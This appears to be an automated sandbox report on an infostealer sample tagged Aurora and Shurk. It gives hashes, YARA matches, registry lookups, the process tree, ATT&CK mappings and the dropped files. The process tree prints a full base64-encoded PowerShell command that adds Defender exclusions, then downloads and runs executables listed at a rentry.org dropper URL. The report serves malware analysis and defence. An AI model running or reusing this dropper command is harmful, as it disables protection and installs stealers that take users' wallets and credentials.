aurora | f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6

General

Target

f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
Size

25.5MB
MD5

ad9eddce12966e365ddb9b7fdae91340
SHA1

7f7bc6ceb99c67e01423c6f171df03f92771224e
SHA256

f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6
SHA512

82932ed99e4a87730b3fda8d4bff0cae261dede6a36a25eae670b10f7d2b6903c2576b4cf8f9d263d9ec8ff22a05b967e039e0d299195bb6aad7f0445bdf2522
SSDEEP

98304:blQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxW:xQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRD

Score

10^/10

aurora shurk infostealer stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/sb54d2/raw

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
infostealer shurk

Shurk Stealer payload 5 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023234-4.dat	shurk_stealer
behavioral2/files/0x0008000000023234-6.dat	shurk_stealer
behavioral2/files/0x0008000000023234-21.dat	shurk_stealer
behavioral2/memory/4252-18-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer
behavioral2/memory/4716-37-0x00007FF743690000-0x00007FF744F9B000-memory.dmp	shurk_stealer

Blocklisted process makes network request 1 IoCs

flow	pid	Process
35	4776	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	black.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe

Executes dropped EXE 2 IoCs

pid	Process
4716	Aurora 22.12.2022_.exe
180	black.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4776	powershell.exe
4776	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4776	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4252 wrote to memory of 4716	4252	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	90
PID 4252 wrote to memory of 4716	4252	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	90
PID 4252 wrote to memory of 180	4252	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	92
PID 4252 wrote to memory of 180	4252	f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe	92
PID 180 wrote to memory of 4776	180	black.exe	93
PID 180 wrote to memory of 4776	180	black.exe	93

C:\Users\Admin\AppData\Local\Temp\f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe
"C:\Users\Admin\AppData\Local\Temp\f4139d1d3f3fb68c221b9c63ad30b560420959803ab3011de83c4028213e96c6.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
  "C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
  2⤵
  - Executes dropped EXE
  PID:4716
- C:\Users\Admin\AppData\Local\Temp\black.exe
  "C:\Users\Admin\AppData\Local\Temp\black.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe

Filesize
4.1MB

MD5
9076f4b5b63a76e61909a6a503ada24e

SHA1
5329200995910b557a2f506bc9f2d4c00e1946a0

SHA256
459ef50689d80330c77dac9b6531d9cda60e02dcca2b56e62042aac6e65da0ba

SHA512
41cef13f534b7bbd0ce8fbb2be63d72c853a42ee96ceec1cd302ab2b2ea13975b443675e619cdd753d887abd2a55cc33b9acfa8e0caeba9f5876d68c89274594

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe

Filesize
10.7MB

MD5
5807b59d51807602deea0b296440073e

SHA1
b91ba1c0b457d7c24c41b078fe38714a018871f1

SHA256
46fce932e9756ff813b2eff4250453537915d04639f68271750409170278858c

SHA512
f21b962210bcf849590cb8352e7697ad58692ea9cc6db17fa517becec0efb8fc2e510877730f01d02e3ce46c080ab5b45c17007a0649cb4261567c7c5613fa2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe

Filesize
1.3MB

MD5
6b818dedc8638c2ae41369f026e9b428

SHA1
f768a3002007412ca55d18ebdcad13f899100066

SHA256
436a44e316e43c9339191cd53ec231d950f6d225c923220d3ce5e5eba6fad9c3

SHA512
faf6d510be9862f001356a7d6052953edf6973cc61b2ad412514b5e487ca27f19febd66fbc0b006b69da3b209e3b5c6a4463c383a23cc2166c69e51df8020688

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kylnguc4.0j2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\black.exe

Filesize
74KB

MD5
b755c4a6af6e4616b7174e9184d4bd01

SHA1
e856e899dcd618263c28ed7f635b2a95746564a2

SHA256
7bfc325de2e448380fe3ae921dddd5b4ab94432d60487d662d7b10ef2b248969

SHA512
def7a5405fda0692f8bf7dbc7cfb67e2e38c6a3391b52209cf73b43b2773216e7bc399e8449d752db6fa6910387f22d7a2cd2a543f30983d13603f75a52345f0

Download Submit
memory/180-20-0x00007FFAE0820000-0x00007FFAE12E1000-memory.dmp

Filesize
10.8MB

Download
memory/180-23-0x00007FFAE0820000-0x00007FFAE12E1000-memory.dmp

Filesize
10.8MB

Download
memory/180-19-0x0000000000E10000-0x0000000000E28000-memory.dmp

Filesize
96KB

Download
memory/4252-18-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/4716-37-0x00007FF743690000-0x00007FF744F9B000-memory.dmp

Filesize
25.0MB

Download
memory/4776-24-0x00007FFAE0820000-0x00007FFAE12E1000-memory.dmp

Filesize
10.8MB

Download
memory/4776-25-0x00000232BFE00000-0x00000232BFE10000-memory.dmp

Filesize
64KB

Download
memory/4776-26-0x00000232BFE00000-0x00000232BFE10000-memory.dmp

Filesize
64KB

Download
memory/4776-32-0x00000232BFE10000-0x00000232BFE32000-memory.dmp

Filesize
136KB

Download
memory/4776-38-0x00000232BFE00000-0x00000232BFE10000-memory.dmp

Filesize
64KB

Download
memory/4776-41-0x00007FFAE0820000-0x00007FFAE12E1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing